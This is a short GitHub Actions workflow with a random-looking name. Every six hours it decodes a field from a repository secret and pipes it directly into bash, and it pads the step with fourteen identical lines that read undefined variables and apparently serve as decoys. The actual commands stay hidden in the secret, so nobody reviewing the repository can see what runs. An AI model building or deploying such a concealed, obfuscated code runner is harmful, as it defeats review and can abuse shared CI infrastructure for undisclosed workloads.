name: beenlemur
on:
  workflow_dispatch:
  schedule:
    - cron: '8 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: beenlemur
        env:
          u21: ${{ secrets.u21 }}
        run: |
          echo $u21 | jq -r .hv3 | /bin/bash
          echo $c621 | jq -r .waxd28 | /bin/bash
          echo $vnyc71 | jq -r .oqrjp082 | /bin/bash
          echo $xzhg285 | jq -r .j89348 | /bin/bash
          echo $pndba35829 | jq -r .hivdx93684 | /bin/bash
          echo $gmvsb319 | jq -r .etniz773 | /bin/bash
          echo $rndw1 | jq -r .mir375 | /bin/bash
          echo $iarki005 | jq -r .clq61 | /bin/bash
          echo $upgu15290 | jq -r .slq076 | /bin/bash
          echo $iq9 | jq -r .iam735 | /bin/bash
          echo $vpkr82648 | jq -r .ya95864 | /bin/bash
          echo $kda72168 | jq -r .occ56 | /bin/bash
          echo $fsxbm51130 | jq -r .ibkv56505 | /bin/bash
          echo $o13 | jq -r .wao2 | /bin/bash
          echo $ourjp2390 | jq -r .lxa0154 | /bin/bash

